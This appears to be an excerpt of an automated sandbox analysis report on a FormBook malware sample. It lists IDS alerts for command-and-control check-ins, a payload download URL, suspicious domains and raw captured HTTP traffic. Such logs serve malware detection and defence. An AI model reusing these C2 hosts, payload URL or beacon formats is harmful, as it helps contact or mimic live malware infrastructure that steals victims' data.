            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 134.0.14.158:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49810 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 209.74.77.109:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49826 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 149.88.81.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 208.91.197.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 208.91.197.39:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.optimismbank.xyz
            Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
            Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49748 -> 122.201.127.17:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:56:07 GMTserver: Apacheset-cookie: __tad=1733248567.7025274; expires=Fri, 01-Dec-2034 17:56:07 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:56:10 GMTserver: Apacheset-cookie: __tad=1733248570.8813292; expires=Fri, 01-Dec-2034 17:56:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:56:13 GMTserver: Apacheset-cookie: __tad=1733248573.2895854; expires=Fri, 01-Dec-2034 17:56:13 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:59:44 GMTserver: Apacheset-cookie: __tad=1733248784.2117578; expires=Fri, 01-Dec-2034 17:59:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:59:47 GMTserver: Apacheset-cookie: __tad=1733248787.4845084; expires=Fri, 01-Dec-2034 17:59:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 17:59:50 GMTserver: Apacheset-cookie: __tad=1733248790.1701818; expires=Fri, 01-Dec-2034 17:59:50 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
            Source: global trafficHTTP traffic detected: GET /hEuJhxvbfOcCGqtagtOtF215.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
